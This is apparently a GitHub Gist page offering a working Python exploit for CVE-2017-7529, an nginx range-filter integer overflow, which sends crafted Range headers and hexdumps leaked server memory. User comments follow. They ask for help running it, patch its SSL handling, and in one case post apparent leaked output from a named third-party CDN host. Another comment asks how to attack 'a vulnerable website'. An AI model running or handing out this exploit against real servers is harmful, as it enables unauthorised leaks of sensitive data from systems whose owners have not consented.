-
-
Save BlackVirusScript/75fae10a037c376555b0ad3f3da1a966 to your computer and use it in GitHub Desktop.
| # Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable | |
| # to integer overflow vulnerability in nginx range filter module resulting into leak | |
| # of potentially sensitive information triggered by specially crafted request. | |
| # * CVE-2017-7529 | |
| # - By @BlackViruScript / @Black#4544 | |
| import urllib.parse, requests, argparse | |
| global colorama, termcolor | |
| try: | |
| import colorama, termcolor | |
| colorama.init(autoreset=True) | |
| except Exception as e: | |
| termcolor = colorama = None | |
| colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text | |
| class Exploit(requests.Session): | |
| buffer = set() | |
| def __init__(self, url): | |
| length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623 | |
| super().__init__() | |
| self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"} | |
| self.target = urllib.parse.urlsplit(url) | |
| def check(self): | |
| try: | |
| response = self.get(self.target.geturl()) | |
| return response.status_code == 206 and "Content-Range" in response.text | |
| except Exception as e: | |
| return False | |
| def hexdump(self, data): | |
| for b in range(0, len(data), 16): | |
| line = [char for char in data[b: b + 16]] | |
| print(colored(" - {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True)) | |
| def execute(self): | |
| vulnerable = self.check() | |
| print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow")) | |
| if vulnerable: | |
| data = b"" | |
| while len(self.buffer) < 0x80: | |
| try: | |
| response = self.get(self.target.geturl()) | |
| for line in response.content.split(b"\r\n"): | |
| if line not in self.buffer: | |
| data += line | |
| self.buffer.add(line) | |
| except Exception as e: | |
| print() | |
| print(colored(f"[!] {type(e).__name__}:", "red")) | |
| print(colored(f" - {e}", "red", True)) | |
| break | |
| except KeyboardInterrupt: | |
| print() | |
| print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red")) | |
| break | |
| print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r") | |
| if data: | |
| print() | |
| self.hexdump(data) | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser(prog = "CVE-2017-7529", | |
| description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.", | |
| epilog = "By: @BlackViruScript / @Black#4544") | |
| parser.add_argument("url", type = str, help = "Target URL.") | |
| parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.") | |
| args = parser.parse_args() | |
| try: | |
| exploit = Exploit(args.url) | |
| if args.check: | |
| vulnerable = exploit.check() | |
| print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow")) | |
| else: | |
| try: | |
| exploit.execute() | |
| except Exception as e: | |
| print(colored(f"[!] {type(e).__name__}:", "red")) | |
| print(colored(f" - {e}", "red", True)) | |
| except KeyboardInterrupt: | |
| print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red")) | |
| except Exception as e: | |
| print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red")) |
to execute do "python3 ("name of the exploitfile").py "URL" "
Error running this Script. How to fix it
File "test.py", line 21
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
^
SyntaxError: invalid syntax
You need to install python 3.6. This link helped me to fix the problem on Ubuntu 16.04.
http://ubuntuhandbook.org/index.php/2017/07/install-python-3-6-1-in-ubuntu-16-04-lts/
Any info if it is still working at nginx 1. 14 ? It seems to be working, returning source code of the webpage. Thx
I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?
File "test.py", line 83
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).name}", "red"))
^
IndentationError: expected an indented block
I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?
Did you implement a fix?
I just need it to ignore SSL,but accept https (Self signed) it doesn't even have to validate.
Cant be used with https targets
python3 CVE-2017-7529.py -c XXXXX.com/manager/html
[!] : MissingSchema
Everytime I run this script it gives me the above error.
[+] steamcdn-a.akamaihd.net is Vulnerable: TRUE
[i] Receiving Data [134 bytes] ...
[!] ConnectionError:
-
HTTPSConnectionPool(host='steamcdn-a.akamaihd.net', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7fa0ef76fdd8>: Failed to establish a new connection: [Errno -2] Name or service not known'))
-
0000: 2d 2d 42 46 32 31 43 33 42 43 33 36 38 35 42 43 --BF21C3BC3685BC
-
0010: 38 30 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 80Content-Type:
-
0020: 74 65 78 74 2f 68 74 6d 6c 43 6f 6e 74 65 6e 74 text/htmlContent
-
0030: 2d 52 61 6e 67 65 3a 20 62 79 74 65 73 20 30 2d -Range: bytes 0-
-
0040: 34 34 2f 34 35 3c 68 74 6d 6c 3e 0a 3c 68 65 61 44/45.<hea
-
0050: 64 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 d>..<body
-
0060: 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c >..</html
-
0070: 3e 0a 2d 2d 42 46 32 31 43 33 42 43 33 36 38 35 >.--BF21C3BC3685
$ python3 t.py https://google.com
[!] google.com: TypeError
help me plz
Not working
On nginx 1.10 it says not vulnerable
Hello bro ,
i have a vulnerable website..
please tell me how to exploit it..
For the SSL errors just change line 19 to this:
length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623
python3 CVE-2017-7529.py -c XXXXX.com/manager/html
[!] : MissingSchemaEverytime I run this script it gives me the above error.
You're missing http:// on the url, schema means https or http
I am getting ssl error.. reading the code to add ssl verification... Do you already have the ssl version?
Did you implement a fix?
I just need it to ignore SSL,but accept https (Self signed) it doesn't even have to validate.
inside it on line 19 change it from
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
to
length = int(requests.get(url, verify=False).headers.get("Content-Length", 0)) + 623
and it will run fine
thanks for this! grateful for the sharing of knowledge
how to execute this code